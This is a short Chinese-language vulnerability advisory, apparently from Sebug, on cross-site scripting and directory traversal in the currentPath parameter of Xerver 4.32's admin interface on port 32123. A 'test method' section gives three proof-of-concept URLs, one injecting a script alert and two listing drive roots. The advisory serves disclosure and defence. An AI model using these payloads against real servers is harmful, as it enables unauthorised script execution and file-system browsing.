Xerver管理界面currentPath参数跨站脚本和目录遍历漏洞

Xerver管理界面currentPath参数跨站脚本和目录遍历漏洞 影响版本:
Xerver 4.32漏洞描述:
BUGTRAQ  ID: 36457
CVE ID: CVE-2009-3562,CVE-2009-3561

Xerver是一个免费的包括Web与FTP的服务器。

当action设置为chooseDirectory时，Xerver HTTP服务器中运行在32123端口上的管理接口没有正确地验证用户提交的currentPath参数便返回给了用户，远程安全者可以通过提交恶意参数请求执行跨站脚本或目录遍历安全。<*参考 
http://secunia.com/advisories/36681/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!http://127.0.0.1:32123/action=chooseDirectory&currentPath=’">><script>alert(’XSS By Stack’)</script>
http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C
http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:/SEBUG安全建议:
厂商补丁：

Xerver
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.javascript.nu/xerver/